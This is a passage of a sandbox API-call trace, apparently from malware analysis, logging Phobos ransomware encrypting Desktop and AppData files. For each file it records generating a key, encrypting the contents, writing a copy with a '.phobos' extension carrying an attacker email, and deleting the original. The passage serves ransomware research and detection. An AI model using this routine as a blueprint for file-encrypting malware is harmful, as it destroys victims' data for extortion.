HALPmcxz\\AppData\\Roaming\\Uk6Qo-ok7CDEt9a.csv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uk6qo-ok7cdet9a.csv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.602] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.602] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.602] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb587, lpOverlapped=0x0) returned 1 [0195.801] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb590, dwBufLen=0xb590 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb590) returned 1 [0195.801] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb590, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb590, lpOverlapped=0x0) returned 1 [0195.803] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0195.803] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.803] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0195.803] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.803] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0195.803] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.803] CloseHandle (hObject=0x180) returned 1 [0195.803] CloseHandle (hObject=0x134) returned 1 [0195.804] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Uk6Qo-ok7CDEt9a.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uk6qo-ok7cdet9a.csv")) returned 1 [0195.805] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.806] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=282) returned 1 [0195.806] CloseHandle (hObject=0x134) returned 1 [0195.806] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini")) returned 0x26 [0195.806] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.807] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.807] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.808] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.808] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.808] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x11a, lpOverlapped=0x0) returned 1 [0195.808] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0195.808] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0195.809] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0195.809] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.809] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0195.809] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.809] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0195.810] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.810] CloseHandle (hObject=0x134) returned 1 [0195.810] CloseHandle (hObject=0x180) returned 1 [0195.812] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini")) returned 1 [0195.813] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dvFf7Hlk.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dvff7hlk.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.814] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=51530) returned 1 [0195.814] CloseHandle (hObject=0x180) returned 1 [0195.814] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dvFf7Hlk.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dvff7hlk.mp3")) returned 0x20 [0195.814] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dvFf7Hlk.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dvff7hlk.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dvFf7Hlk.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dvff7hlk.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.814] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.814] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dvFf7Hlk.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dvff7hlk.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.815] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.815] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.815] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xc94a, lpOverlapped=0x0) returned 1 [0195.817] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc950, dwBufLen=0xc950 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc950) returned 1 [0195.817] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc950, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc950, lpOverlapped=0x0) returned 1 [0195.819] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0195.819] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.819] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0195.819] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.819] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0195.820] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.820] CloseHandle (hObject=0x180) returned 1 [0195.820] CloseHandle (hObject=0x134) returned 1 [0195.820] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dvFf7Hlk.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dvff7hlk.mp3")) returned 1 [0195.823] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FoPmTlXOKuop2R.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fopmtlxokuop2r.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.824] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16324) returned 1 [0195.825] CloseHandle (hObject=0x134) returned 1 [0195.825] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FoPmTlXOKuop2R.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fopmtlxokuop2r.flv")) returned 0x20 [0195.825] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FoPmTlXOKuop2R.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fopmtlxokuop2r.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FoPmTlXOKuop2R.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fopmtlxokuop2r.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.825] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.825] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FoPmTlXOKuop2R.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fopmtlxokuop2r.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.826] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.826] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.826] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3fc4, lpOverlapped=0x0) returned 1 [0195.828] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3fd0, dwBufLen=0x3fd0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3fd0) returned 1 [0195.828] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3fd0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3fd0, lpOverlapped=0x0) returned 1 [0195.830] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0195.830] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.830] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0195.830] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.830] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0195.830] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.830] CloseHandle (hObject=0x134) returned 1 [0195.830] CloseHandle (hObject=0x180) returned 1 [0195.831] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FoPmTlXOKuop2R.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fopmtlxokuop2r.flv")) returned 1 [0195.833] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.833] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fw1yVQQ4bJEe.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fw1yvqq4bjee.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.834] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=99392) returned 1 [0195.834] CloseHandle (hObject=0x180) returned 1 [0195.834] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fw1yVQQ4bJEe.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fw1yvqq4bjee.mp3")) returned 0x20 [0195.834] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fw1yVQQ4bJEe.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fw1yvqq4bjee.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fw1yVQQ4bJEe.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fw1yvqq4bjee.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.835] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.835] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fw1yVQQ4bJEe.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fw1yvqq4bjee.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.836] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.836] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.836] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x18440, lpOverlapped=0x0) returned 1 [0195.838] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x18450, dwBufLen=0x18450 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x18450) returned 1 [0195.839] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x18450, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x18450, lpOverlapped=0x0) returned 1 [0195.841] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0195.842] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.842] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0195.842] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.842] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0195.842] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.842] CloseHandle (hObject=0x180) returned 1 [0195.842] CloseHandle (hObject=0x134) returned 1 [0195.842] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fw1yVQQ4bJEe.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fw1yvqq4bjee.mp3")) returned 1 [0195.844] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GyH9tFXtnU2kfsyVw.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gyh9tfxtnu2kfsyvw.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.845] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=70349) returned 1 [0195.845] CloseHandle (hObject=0x134) returned 1 [0195.845] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GyH9tFXtnU2kfsyVw.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gyh9tfxtnu2kfsyvw.pdf")) returned 0x20 [0195.845] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GyH9tFXtnU2kfsyVw.pdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gyh9tfxtnu2kfsyvw.pdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GyH9tFXtnU2kfsyVw.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gyh9tfxtnu2kfsyvw.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.845] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.846] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GyH9tFXtnU2kfsyVw.pdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gyh9tfxtnu2kfsyvw.pdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.848] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.848] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.848] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x112cd, lpOverlapped=0x0) returned 1 [0195.850] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x112d0, dwBufLen=0x112d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x112d0) returned 1 [0195.851] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112d0, lpOverlapped=0x0) returned 1 [0195.853] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0195.853] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.853] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, 